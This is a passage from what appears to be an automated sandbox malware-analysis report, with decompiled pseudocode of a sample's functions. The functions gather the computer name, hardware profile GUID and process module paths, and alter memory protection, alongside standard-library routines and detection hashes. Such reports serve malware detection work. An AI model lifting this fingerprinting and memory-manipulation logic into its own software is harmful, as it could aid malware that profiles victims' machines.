				if( *((intOrPtr*)(__esi + 4)) != 0 ||  *(__esi + 0xc) != 0 ||  *(__esi + 0x20) != 0 ||  *((intOrPtr*)(__esi + 0x18)) != 0 ||  *((intOrPtr*)(__esi + 0x14)) != 0 ||  *((intOrPtr*)(__esi + 0x2c)) != 0) {
					return 0x1000000;
				} else {
					if(__edi != 0) {
						_t15 = CreateFileMappingA(0xffffffff, 0, 4, 0, __edi, 0); // executed
						 *(__esi + 0xc) = _t15;
						if(_t15 != 0) {
							_t16 = MapViewOfFile(_t15, 0xf001f, 0, 0, __edi); // executed
							 *(__esi + 0x20) = _t16;
							if(_t16 != 0) {
								 *((intOrPtr*)(__esi + 0x24)) = 0;
								 *((char*)(__esi + 0x1c)) = 1;
								 *((intOrPtr*)(__esi + 0x28)) = __edi;
								return 0;
							} else {
								CloseHandle( *(__esi + 0xc));
								 *(__esi + 0xc) = 0;
								goto L9;
							}
						} else {
							L9:
							return 0x300;
						}
					} else {
						return 0x30000;
					}
				}
			}

0x0041dbc7
0x0041dc41
0x0041dbe2
0x0041dbe4
0x0041dbf5
0x0041dbfb
0x0041dc00
0x0041dc12
0x0041dc18
0x0041dc1d
0x0041dc2d
0x0041dc30
0x0041dc34
0x0041dc3a
0x0041dc1f
0x0041dc22
0x0041dc28
0x00000000
0x0041dc28
0x0041dc02
0x0041dc02
0x0041dc08
0x0041dc08
0x0041dbe6
0x0041dbec
0x0041dbec
0x0041dbe4

APIs

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,000F4240,00000000), ref: 0041DBF5

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: dd82bdce04938234ef098b6609d871be28b322fd5f12e267ddea0f67b1daa49e
Instruction ID: 3c52578bf70624a5be771bdb22b6ad944e46aebee89f379be7344fbc33be68b0
Opcode Fuzzy Hash: dd82bdce04938234ef098b6609d871be28b322fd5f12e267ddea0f67b1daa49e
Instruction Fuzzy Hash: 9B0192F0905704AFDB305F25D9D4A63B7A9E716319B108E3FE5D682640E37898C0DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00417EF5 Relevance: 4.5, APIs: 3, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00417EF5(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, long _a4) {
				signed int _v8;
				char _v268;
				signed int _v272;
				void* __esi;
				signed int _t8;
				intOrPtr _t19;
				intOrPtr _t23;
				intOrPtr _t24;
				void* _t25;
				signed int _t26;

				_t24 = __edi;
				_t23 = __edx;
				_t19 = __ebx;
				_t8 =  *0x444664; // 0xfa3a0753
				_v8 = _t8 ^ _t26;
				_v272 = _v272 & 0x00000000;
				_t25 = OpenProcess(0x410, 0, _a4);
				if(_t25 != 0) {
					 *0x44750c(_t25, 0,  &_v268, 0x104); // executed
					CloseHandle(_t25);
				}
				E004049CF(_t19,  &_v268);
				return E0041F69E(_t19, _t19, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x00417ef5
0x00417ef5
0x00417ef5
0x00417efe
0x00417f05
0x00417f0b
0x00417f21
0x00417f25
0x00417f36
0x00417f3d
0x00417f3d
0x00417f4c
0x00417f5f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000010,?), ref: 00417F1B
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00417F36
CloseHandle.KERNEL32(00000000), ref: 00417F3D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 36ad891420a6859dd360226d626558246fc1dba3a01590c0a4e1782ef8a6ab21
Instruction ID: 4c8e827c9177d35eb614bbc27740d0f934e66a24863f5dda96ffd1cf4ca763de
Opcode Fuzzy Hash: 36ad891420a6859dd360226d626558246fc1dba3a01590c0a4e1782ef8a6ab21
Instruction Fuzzy Hash: 93F09074605218ABD710EF24DC46FDE77B8AF05704F000075F941EA190CBB4AA898F9C

Uniqueness

Uniqueness Score: -1.00%

Function 004046FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004046FE(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _t17;
				signed int _t19;
				unsigned int _t22;
				int _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t36;
				void* _t40;
				unsigned int* _t43;

				_t40 = __edi;
				_t17 =  *((intOrPtr*)(__edi + 0x138));
				_t36 = 0;
				if(0 >=  *((intOrPtr*)(__edi + 0x46))) {
					L17:
					goto L18;
				} else {
					_t43 = _t17 + 0x24;
					do {
						_t19 =  *_t43;
						if((_t19 & 0x00000020) != 0) {
							 *_t43 = _t19 | 0x60000000;
						}
						_t22 =  *_t43 >> 0x1d;
						if(_t22 == 0) {
							L14:
							_v8 = 2;
						} else {
							_t28 = _t22 - 1;
							if(_t28 == 0) {
								_v8 = 0x10;
								L15:
								_t26 = VirtualProtect( *((intOrPtr*)(_t43 - 0x18)) +  *((intOrPtr*)(_t40 + 0x144)),  *(_t43 - 0x1c), _v8,  &_v8); // executed
								if(_t26 == 0) {
									_push(9);
									_pop(0);
									L18:
									return 0;
								}
								goto L16;
							}
							_t29 = _t28 - 1;
							if(_t29 == 0) {
								goto L14;
							}
							_t30 = _t29 - 1;
							if(_t30 == 0) {
								_v8 = 0x20;
							} else {
								_t31 = _t30 - 1;
								if(_t31 == 0 || _t31 == 0) {
									_v8 = 4;
								} else {
									_v8 = 0x40;
								}
							}
						}
						goto L15;
						L16:
						_t36 = _t36 + 1;
						_t43 =  &(_t43[0xa]);
					} while (_t36 < ( *(_t40 + 0x46) & 0x0000ffff));
					goto L17;
				}
			}

0x004046fe
0x00404702
0x0040470b
0x00404712
0x00404793
0x00000000
0x00404714
0x00404714
0x00404717
0x00404717
0x0040471b
0x00404722
0x00404722
0x00404729
0x0040472c
0x00404762
0x00404762
0x0040472e
0x0040472e
0x0040472f
0x00404759
0x00404769
0x0040477d
0x00404785
0x00404799
0x0040479b
0x00404795
0x00404798
0x00404798
0x00000000
0x00404785
0x00404731
0x00404732
0x00000000
0x00000000
0x00404734
0x00404735
0x00404750
0x00404737
0x00404737
0x00404738
0x00404747
0x0040473e
0x0040473e
0x0040473e
0x00404738
0x00404735
0x00000000
0x00404787
0x0040478b
0x0040478c
0x0040478f
0x00000000
0x00404717

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002), ref: 0040477D

Strings

, xrefs: 00404750

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 46190fd2bfc1646f35aea86ca58feb5260a4d45d0f21cd0472b8d559df7ac96b
Instruction ID: fac905fa80c7b6d0483f112c69ef5445ac7f2cfda61a70b3f6acc5adffe1120b
Opcode Fuzzy Hash: 46190fd2bfc1646f35aea86ca58feb5260a4d45d0f21cd0472b8d559df7ac96b
Instruction Fuzzy Hash: EE119AF1200209EADB24DFE5DA447AAB3E4FB86340F6004379741E72C0C378AE41E759

Uniqueness

Uniqueness Score: -1.00%

Function 00404BB8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00404BB8(void* __ebx, char* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t14;
				char* _t15;
				void* _t17;
				intOrPtr _t18;

				_t17 = __edi;
				_t15 = __ecx;
				_t14 = __ebx;
				_t18 = _a4;
				if(_t18 > 0xfffffffe) {
					E0041EBA3("string too long");
				}
				_t7 =  *((intOrPtr*)(_t15 + 0x14));
				_t20 = _t7 - _t18;
				if(_t7 >= _t18) {
					__eflags = _a8;
					if(_a8 == 0) {
						L9:
						__eflags = _t18;
						if(_t18 == 0) {
							 *((intOrPtr*)(_t15 + 0x10)) = 0;
							__eflags = _t7 - 0x10;
							if(_t7 >= 0x10) {
								_t15 =  *_t15;
							}
							 *_t15 = 0;
						}
						goto L13;
					}
					__eflags = _t18 - 0x10;
					if(_t18 >= 0x10) {
						goto L9;
					}
					_t10 =  *((intOrPtr*)(_t15 + 0x10));
					__eflags = _t18 - _t10;
					if(_t18 < _t10) {
						_t10 = _t18;
					}
					E00404A66(_t15, 1, _t10);
					goto L13;
				} else {
					_push( *((intOrPtr*)(_t15 + 0x10)));
					_push(_t18); // executed
					E00404CCF(_t14, _t15, _t17, _t18, _t20); // executed
					L13:
					asm("sbb eax, eax");
					return  ~0x00000000;
				}
			}

0x00404bb8
0x00404bb8
0x00404bb8
0x00404bbc
0x00404bc2
0x00404bc9
0x00404bc9
0x00404bce
0x00404bd1
0x00404bd3
0x00404be2
0x00404be5
0x00404bff
0x00404bff
0x00404c01
0x00404c03
0x00404c06
0x00404c09
0x00404c0b
0x00404c0b
0x00404c0d
0x00404c0d
0x00000000
0x00404c01
0x00404be7
0x00404bea
0x00000000
0x00000000
0x00404bec
0x00404bef
0x00404bf1
0x00404bf3
0x00404bf3
0x00404bf8
0x00000000
0x00404bd5
0x00404bd5
0x00404bd8
0x00404bd9
0x00404c0f
0x00404c13
0x00404c19
0x00404c19

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404BC9

Part of subcall function 0041EBA3: std::exception::exception.LIBCMT ref: 0041EBB8
Part of subcall function 0041EBA3: __CxxThrowException@8.LIBCMT ref: 0041EBCD
Part of subcall function 0041EBA3: std::exception::exception.LIBCMT ref: 0041EBDE

Strings

string too long, xrefs: 00404BC4

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: string too long
API String ID: 1823113695-2556327735
Opcode ID: e1860df2ff9180e99f7537f2e0fa1fbad04c7d747c243b30cd02159ef242f360
Instruction ID: 53df7c38ff81c866dc29d68b2ef7da2c257602e2a00084db69ceff1409eea5d0
Opcode Fuzzy Hash: e1860df2ff9180e99f7537f2e0fa1fbad04c7d747c243b30cd02159ef242f360
Instruction Fuzzy Hash: 01F02DB050D1205BEB14B92948809B9361297C2314321457BF665FF1C2C579EC81579D

Uniqueness

Uniqueness Score: -1.00%

Function 004171BF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004171BF(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				struct tagHW_PROFILE_INFOA _v132;
				signed int _v136;
				signed int _t7;
				int _t10;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t22;

				_t21 = __esi;
				_t20 = __edi;
				_t19 = __edx;
				_t15 = __ebx;
				_t7 =  *0x444664; // 0xfa3a0753
				_v8 = _t7 ^ _t22;
				_v136 = _v136 & 0x00000000;
				_t10 = GetCurrentHwProfileA( &_v132); // executed
				_t16 = __esi;
				if(_t10 == 0) {
					_push("Unknown");
				} else {
					_push( &(_v132.szHwProfileGuid));
				}
				E004049CF(_t16);
				return E0041F69E(_t21, _t15, _v8 ^ _t22, _t19, _t20, _t21);
			}

0x004171bf
0x004171bf
0x004171bf
0x004171bf
0x004171c8
0x004171cf
0x004171d2
0x004171dd
0x004171e3
0x004171e7
0x004171ef
0x004171e9
0x004171ec
0x004171ec
0x004171f4
0x00417206

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 004171DD

Strings

Unknown, xrefs: 004171EF

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: d10450df420bbbad8a4c92c0127103eb6f009c5d8376c2e617fc082852c7a7ce
Instruction ID: f038ec6399105791d34ba8940bd3d83b74cea3c734de0d03b1318f782f17b78d
Opcode Fuzzy Hash: d10450df420bbbad8a4c92c0127103eb6f009c5d8376c2e617fc082852c7a7ce
Instruction Fuzzy Hash: B4E09B70A04209A7CF10DBA5C902B9D73F86B48708F50007AE901D3280DF3CD609C759

Uniqueness

Uniqueness Score: -1.00%

Function 0041704D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041704D(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				char _v32776;
				long _v32780;
				signed int _t9;
				int _t13;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t22;

				_t21 = __esi;
				_t20 = __edi;
				_t19 = __edx;
				_t16 = __ebx;
				E0042E350(0x8008);
				_t9 =  *0x444664; // 0xfa3a0753
				_v8 = _t9 ^ _t22;
				_v32780 = 0x7fff;
				_t13 = GetComputerNameA( &_v32776,  &_v32780); // executed
				_t14 = "Unknown";
				if(_t13 != 0) {
					_t14 =  &_v32776;
				}
				return E0041F69E(_t14, _t16, _v8 ^ _t22, _t19, _t20, _t21);
			}

0x0041704d
0x0041704d
0x0041704d
0x0041704d
0x00417055
0x0041705a
0x00417061
0x00417072
0x0041707c
0x00417084
0x00417089
0x0041708b
0x0041708b
0x0041709c

APIs

GetComputerNameA.KERNEL32 ref: 0041707C

Strings

Unknown, xrefs: 00417084

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: Unknown
API String ID: 3545744682-1654365787
Opcode ID: 8cd514adc5a8a9f818209d37b8be1fbce0876040b447dbe1a1ad6cabb7360985
Instruction ID: 4d7a1f3b6fbe4e0f6adcd5f23c0fd01d086ac8c554b782ea7cb644af5b2a3fc0
Opcode Fuzzy Hash: 8cd514adc5a8a9f818209d37b8be1fbce0876040b447dbe1a1ad6cabb7360985
Instruction Fuzzy Hash: DCE0ED35A002189BC790DF59DD41BDA77F8BB48304F4080BA954ED3241DE38AE8C8F58

Uniqueness

Uniqueness Score: -1.00%

Function 00415FE1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00415FE1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				void* _t24;

				_push(4);
				E00423610(E00433ACF, __ebx, __edi, __esi);
				_t20 =  *((intOrPtr*)(_t24 + 8));
				 *((intOrPtr*)(_t24 - 0x10)) = 0;
				 *((intOrPtr*)(_t20 +  *((intOrPtr*)( *_t20 + 4)))) = 0x43fd9c;
				 *((intOrPtr*)(_t20 + 8)) = 0;
				 *((intOrPtr*)(_t20 + 0xc)) = 0;
				E00416323( *((intOrPtr*)( *_t20 + 4)) + _t20,  *((intOrPtr*)( *_t20 + 4)) + _t20,  *((intOrPtr*)(_t24 + 0xc))); // executed
				return E004236AF(_t20);
			}

0x00415fe1
0x00415fe8
0x00415fed
0x00415ff5
0x00415ffd
0x00416004
0x00416007
0x00416011
0x0041601d

APIs

__EH_prolog3.LIBCMT ref: 00415FE8

Part of subcall function 00416323: std::locale::_Init.LIBCPMT ref: 00416362
Part of subcall function 00416323: std::locale::facet::_Incref.LIBCPMT ref: 00416370

Strings

^A, xrefs: 00415FFD

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3IncrefInitstd::locale::_std::locale::facet::_
String ID: ^A
API String ID: 2441394073-3251803456
Opcode ID: da08cf342c23c9993324ff090f8de2659477f16813242f5ba47b602f6e3a7690
Instruction ID: c3214bd5e39af95b2d5d9e160628f0725e4044f73dfd3826ad7bfcd420e24d7c
Opcode Fuzzy Hash: da08cf342c23c9993324ff090f8de2659477f16813242f5ba47b602f6e3a7690
Instruction Fuzzy Hash: 06E01A75A00115AFC741EF29C840A69BBF1BF4C304B55C51AE568DB301D739EA21CBC8

Uniqueness

Uniqueness Score: -1.00%

Function 00404CCF Relevance: 3.1, APIs: 2, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 93%

			E00404CCF(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t30;
				signed int _t32;
				signed int _t34;
				signed int _t39;
				intOrPtr _t40;
				unsigned int _t42;
				unsigned int _t48;
				signed int _t51;
				signed int _t53;
				void* _t54;

				_push(0xc);
				E00423643(E00433067, __ebx, __edi, __esi);
				_t53 = __ecx;
				 *((intOrPtr*)(_t54 - 0x18)) = __ecx;
				_t51 =  *(_t54 + 8) | 0x0000000f;
				if(_t51 <= 0xfffffffe) {
					_t39 = 3;
					_t42 =  *(__ecx + 0x14);
					 *(_t54 - 0x14) = _t42;
					 *(_t54 - 0x14) =  *(_t54 - 0x14) >> 1;
					_t48 =  *(_t54 - 0x14);
					if(_t48 > _t51 / _t39) {
						_t51 = 0xfffffffe;
						if(_t42 <= _t51 - _t48) {
							_t51 = _t48 + _t42;
						}
					}
				} else {
					_t51 =  *(_t54 + 8);
				}
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				_t16 = _t51 + 1; // 0xff
				_push(0);
				_t30 = E00404E31(_t51, _t53, _t16); // executed
				 *(_t54 + 8) = _t30;
				_t40 =  *((intOrPtr*)(_t54 + 0xc));
				if(_t40 != 0) {
					if( *(_t53 + 0x14) < 0x10) {
						_t34 = _t53;
					} else {
						_t34 =  *_t53;
					}
					E0041F8C0( *(_t54 + 8), _t34, _t40);
				}
				E00404A66(_t53, 1, 0);
				_t32 =  *(_t54 + 8);
				 *_t53 = _t32;
				 *(_t53 + 0x14) = _t51;
				 *((intOrPtr*)(_t53 + 0x10)) = _t40;
				if(_t51 < 0x10) {
					_t32 = _t53;
				}
				 *((char*)(_t32 + _t40)) = 0;
				return E004236AF(_t32);
			}

0x00404ccf
0x00404cd6
0x00404cdb
0x00404cdd
0x00404ce3
0x00404ce9
0x00404cf6
0x00404cf9
0x00404cfc
0x00404cff
0x00404d02
0x00404d07
0x00404d0b
0x00404d12
0x00404d14
0x00404d14
0x00404d12
0x00404ceb
0x00404ceb
0x00404ceb
0x00404d17
0x00404d1b
0x00404d1e
0x00404d21
0x00404d28
0x00404d54
0x00404d59
0x00404d5f
0x00404d65
0x00404d61
0x00404d61
0x00404d61
0x00404d6c
0x00404d71
0x00404d7a
0x00404d7f
0x00404d82
0x00404d84
0x00404d87
0x00404d8d
0x00404d8f
0x00404d8f
0x00404d91
0x00404d9a

APIs

__EH_prolog3_catch.LIBCMT ref: 00404CD6
_memmove.LIBCMT ref: 00404D6C

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch_memmove
String ID:
API String ID: 3914490576-0
Opcode ID: e636e4c86e0ecdba8531c5130cb1f6a72128489cc1ed98a98534c243c733167f
Instruction ID: ffca297ac19c999c24e12979ef530958ba55c95f64b663abfd3b5f573f11d945
Opcode Fuzzy Hash: e636e4c86e0ecdba8531c5130cb1f6a72128489cc1ed98a98534c243c733167f
Instruction Fuzzy Hash: 4C11A271B04201ABEB24DF29D84176EB7B6AFC4710F20452FEA45AB3D1C774AE418799

Uniqueness

Uniqueness Score: -1.00%

Function 00417C07 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417C07(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t53;
				intOrPtr _t70;
				intOrPtr _t72;
				void* _t74;

				_t63 = __ecx;
				_push(0xd8);
				E00423679(E00433D35, __ebx, __edi, __esi);
				_t70 = __ecx;
				 *((intOrPtr*)(_t74 - 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(_t74 - 0x38)) = __ecx;
				 *((char*)(__ecx)) = 0;
				 *((intOrPtr*)(_t74 - 0xe4)) = 0x4400e0;
				 *((intOrPtr*)(_t74 - 0xd4)) = 0x4400e8;
				 *((intOrPtr*)(_t74 - 0x84)) = 0x43fd50;
				_t72 = 3;
				 *((intOrPtr*)(_t74 - 4)) = 1;
				 *((intOrPtr*)(_t74 - 0x34)) = _t72;
				E00415FE1(0, __ecx, _t72, 0, _t74 - 0xe4, _t74 - 0xcc); // executed
				_t13 =  *((intOrPtr*)(_t74 - 0xd4)) + 4; // 0x50
				 *((intOrPtr*)(_t74 +  *_t13 - 0xd4)) = 0x440080;
				_t17 =  *((intOrPtr*)(_t74 - 0xe4)) + 4; // 0x60
				 *((intOrPtr*)(_t74 +  *_t17 - 0xe4)) = 0x440088;
				 *((intOrPtr*)(_t74 - 4)) = 5;
				_t22 =  *((intOrPtr*)(_t74 - 0xe4)) + 4; // 0x0
				 *((intOrPtr*)(_t74 +  *_t22 - 0xe4)) = 0x4400dc;
				_push(_t72);
				_push(_t74 - 0xcc);
				E00418FB2(0, _t72, 0);
				_push( *((intOrPtr*)(_t74 + 8)));
				_push(_t74 - 0xd4);
				 *((intOrPtr*)(_t74 - 4)) = 6;
				E00418445(0, _t63, _t70, _t72, 0);
				_t53 = E00418876(_t74 - 0xe4, _t74 - 0x30);
				 *((char*)(_t74 - 4)) = 7;
				E00404A22(_t70, _t53);
				E00404A66(_t74 - 0x30, 1, 0);
				 *((char*)(_t74 - 4)) = 0;
				E0041883E(0, _t74 - 0x84, _t70, _t53, 0);
				 *((intOrPtr*)(_t74 - 0x84)) = 0x43fd48;
				E0041EDCC(_t74 - 0x84);
				return E004236C3(0, _t70, _t53);
			}

0x00417c07
0x00417c07
0x00417c11
0x00417c16
0x00417c1a
0x00417c1d
0x00417c24
0x00417c27
0x00417c2a
0x00417c2c
0x00417c36
0x00417c40
0x00417c4c
0x00417c5a
0x00417c62
0x00417c65
0x00417c70
0x00417c73
0x00417c84
0x00417c87
0x00417c92
0x00417c9f
0x00417ca2
0x00417cad
0x00417cb4
0x00417cb5
0x00417cba
0x00417cc3
0x00417cc4
0x00417ccb
0x00417cda
0x00417ce1
0x00417ce5
0x00417cf0
0x00417cfb
0x00417cfe
0x00417d0a
0x00417d14
0x00417d21

APIs

__EH_prolog3_GS.LIBCMT ref: 00417C11

Part of subcall function 00415FE1: __EH_prolog3.LIBCMT ref: 00415FE8

Part of subcall function 00418FB2: __EH_prolog3.LIBCMT ref: 00418FB9

Part of subcall function 00418445: __EH_prolog3_catch.LIBCMT ref: 0041844C

Part of subcall function 00404A22: _memmove.LIBCMT ref: 00404A3E

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

Part of subcall function 0041883E: __EH_prolog3.LIBCMT ref: 00418845

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00417D14

Part of subcall function 0041EDCC: std::ios_base::_Tidy.LIBCPMT ref: 0041EDED

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3$_memmovestd::ios_base::_$H_prolog3_H_prolog3_catchIos_base_dtorTidy
String ID:
API String ID: 4143508521-0
Opcode ID: f5d095fcb8365823bee2aee0709573a07ce7f9272f6ba632b17da6366f65621e
Instruction ID: e8b50785548c9c60efa5e8a0d498e51c551b293c9619ce0f4171d0f792cbd9d4
Opcode Fuzzy Hash: f5d095fcb8365823bee2aee0709573a07ce7f9272f6ba632b17da6366f65621e
Instruction Fuzzy Hash: 5131EC719011599BDB10DF99DA45BCDBBF8BF04304F50849BA609B7251CB789F88CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00416323 Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00416323(void* __esi, void* __eflags, intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t24;
				intOrPtr _t27;
				void* _t30;
				intOrPtr* _t31;
				void* _t34;
				void* _t36;

				_t36 = __esi;
				 *((intOrPtr*)(__esi + 0x30)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((intOrPtr*)(__esi + 0x14)) = 0x201;
				 *((intOrPtr*)(__esi + 0x18)) = 6;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 0x20)) = 0;
				 *((intOrPtr*)(__esi + 0x24)) = 0;
				 *((intOrPtr*)(__esi + 0x28)) = 0;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				 *((intOrPtr*)(__esi + 0xc)) = 0;
				_t31 = E00420467(_t30, _t34, 0, __esi, __eflags, 4);
				_pop(_t32);
				_t38 = _t31;
				if(_t31 == 0) {
					_t31 = 0;
					__eflags = 0;
				} else {
					_t27 = E0041F0D7(_t31, 0, __esi, _t38); // executed
					 *_t31 = _t27;
					_t32 = E0041EE96();
					E0040F280(_t28);
				}
				_push(0x20);
				_push(_t36);
				 *((intOrPtr*)(_t36 + 0x30)) = _t31;
				 *((intOrPtr*)(_t36 + 0x38)) = _a4;
				 *((intOrPtr*)(_t36 + 0x3c)) = 0;
				_t24 = E00416460(_t31, _t32, 0, _t36, _t38);
				 *(_t36 + 0x40) = _t24;
				if( *((intOrPtr*)(_t36 + 0x38)) == 0) {
					_t24 = ( *(_t36 + 0xc) | 0x00000004) & 0x00000017;
					 *(_t36 + 0xc) = _t24;
					if(( *(_t36 + 0x10) & _t24) != 0) {
						E0040F4EC(0);
						return _t24;
					}
				}
				return _t24;
			}

0x00416323
0x0041632d
0x00416330
0x00416333
0x00416336
0x0041633d
0x00416344
0x00416347
0x0041634a
0x0041634d
0x00416350
0x00416353
0x0041635b
0x0041635d
0x0041635e
0x00416360
0x00416377
0x00416377
0x00416362
0x00416362
0x00416367
0x0041636e
0x00416370
0x00416370
0x0041637c
0x0041637e
0x0041637f
0x00416382
0x00416385
0x00416388
0x0041638d
0x00416393
0x0041639b
0x0041639e
0x004163a4
0x004163a9
0x00000000
0x004163a9
0x004163a4
0x004163b2

APIs

Part of subcall function 00420467: _malloc.LIBCMT ref: 00420481

std::locale::_Init.LIBCPMT ref: 00416362

Part of subcall function 0041F0D7: __EH_prolog3.LIBCMT ref: 0041F0DE
Part of subcall function 0041F0D7: std::_Lockit::_Lockit.LIBCPMT ref: 0041F0F4
Part of subcall function 0041F0D7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041F116
Part of subcall function 0041F0D7: std::locale::_Setgloballocale.LIBCPMT ref: 0041F120
Part of subcall function 0041F0D7: _Yarn.LIBCPMT ref: 0041F136
Part of subcall function 0041F0D7: std::locale::facet::_Incref.LIBCPMT ref: 0041F143

std::locale::facet::_Incref.LIBCPMT ref: 00416370

Part of subcall function 0040F280: std::_Lockit::_Lockit.LIBCPMT ref: 0040F28C

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
String ID:
API String ID: 3761783024-0
